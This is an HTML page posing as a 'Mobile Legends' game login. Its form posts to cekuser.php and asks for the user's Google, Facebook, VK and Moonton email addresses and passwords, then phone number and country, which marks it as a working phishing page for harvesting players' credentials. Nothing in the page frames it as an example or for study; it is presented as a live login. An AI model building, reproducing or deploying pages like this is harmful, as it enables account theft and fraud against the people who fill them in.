<!DOCTYPE html>
<html lang="en" >

<head>
  <meta charset="UTF-8">
  <title>Mobile Legends - Login</title>
  <link href='https://fonts.googleapis.com/css?family=Titillium+Web:400,300,600' rel='stylesheet' type='text/css'>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">

  
      <link rel="stylesheet" href="css/style.css">

  
</head>

<body>
  <div class="form">
      <ul class="tab-group">
        <center><img src="https://lh6.googleusercontent.com/proxy/A9M9MNe_BwMidV_pz5WDjadcahaaKwtQWWCVg8KycfwO4eP2bIgx6n4PDio79u2MTeg014FuWaRiXJaQNXu3igmezQ=w277-h149-nc"></center>
      </ul>
      <div class="tab-content">
        <div id="signup">   
          <h1>LOGIN</h1>
          
          <form action="cekuser.php" method="post">
          
          <div class="top-row">
            <div class="field-wrap">
              <label>
                First Name<span class="req">*</span>
              </label>
              <input type="text" id="fname" name="fname" required autocomplete="off" />
            </div>
        
            <div class="field-wrap">
              <label>
                Last Name<span class="req">*</span>
              </label>
              <input type="text" id="secname" name="secname" required autocomplete="off"/>
            </div>
          </div>
<center><img src="http://pngimg.com/uploads/google/google_PNG19630.png?i=1" height="50px" width="50px"></center>
<br>
          <div class="field-wrap">
            <label>
              Email Google<span class="req">*</span>
            </label>
            <input type="email" id="mailg" name="mailg" required autocomplete="off"/>
          </div>
          
          <div class="field-wrap">
            <label>
              Password Google<span class="req">*</span>
            </label>
            <input type="password" id="pwg" name="pwg" required autocomplete="off"/>
            
          </div>
          <center><img src="http://www.freepngimg.com/thumb/facebook/2-2-facebook-free-download-png-thumb.png" height="50px" width="50px"></center>
          <br>
          
          <div class="field-wrap">
            <label>
              Email Facebook<span class="req">*</span>
            </label>
            <input type="text" id="mailfb" name="mailfb" required autocomplete="off"/>
          </div>
          
          <div class="field-wrap">
            <label>
              Password Facebook<span class="req">*</span>
            </label>
            <input type="password" id="pwfb" name="pwfb" required autocomplete="off"/>
          </div>
<center><img src="http://icons-for-free.com/icon/download-circle_russian_social_vk_icon-232768.png?i=1" height="50px" width="50px"></center>
<br>          
          <div class="field-wrap">
            <label>
              Email VK<span class="req">*</span>
            </label>
            <input type="email" id="mailvk1" name="mailvk1" required autocomplete="off"/>
          </div>
         
          
          <div class="field-wrap">
            <label>
              Password VK<span class="req">*</span>
            </label>
            <input type="password" id="pwvk" name="pwvk" required autocomplete="off"/>
          </div>
       <center><img src="http://www.flipgeeks.com/wp-content/uploads/2018/04/Moonton-logo.png?i=1" height="50px" width="50px"></center>
<br>          
          <div class="field-wrap">
            <label>
              Email Moonton<span class="req">*</span>
            </label>
            <input type="email" id="mailm" name="mailm" required autocomplete="off"/>
          </div>
         
          
          <div class="field-wrap">
            <label>
              Password Moonton<span class="req">*</span>
            </label>
            <input type="password" id="pwm" name="pwm" required autocomplete="off"/>
          </div>
                 
          <center><font color="white"><h2>DETAIL ACCOUNT</h2></center></font>
          <br>
           <div class="field-wrap">
            <label>
              Phone Number<span class="req">*</span>
            </label>
            <input type="number" id="hp" name="hp" required autocomplete="off"/>
          </div>
          
          <div class="field-wrap">
            <label>
              Country<span class="req">*</span>
            </label>
            <input type="text" id="kota" name="kota" required autocomplete="off"/>
          </div>
          
         
          
          <button type="submit" class="button button-block"/>LOGIN</button>
          
          </form>

        </div>
        
        <div id="login">   
          <h1>Welcome Back!</h1>
          
          <form action="/" method="post">
          
            <div class="field-wrap">
            <label>
              Email Address<span class="req">*</span>
            </label>
            <input type="email"required autocomplete="off"/>
          </div>
          
          <div class="field-wrap">
            <label>
              Password<span class="req">*</span>
            </label>
            <input type="password"required autocomplete="off"/>
          </div>
          
          <p class="forgot"><a href="#">Forgot Password?</a></p>
          
          <button class="button button-block"/>Log In</button>
          
          </form>

        </div>
        
      </div><!-- tab-content -->
      
</div> <!-- /form -->
  <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>

  

    <script  src="js/index.js"></script>




</body>

</html>
>
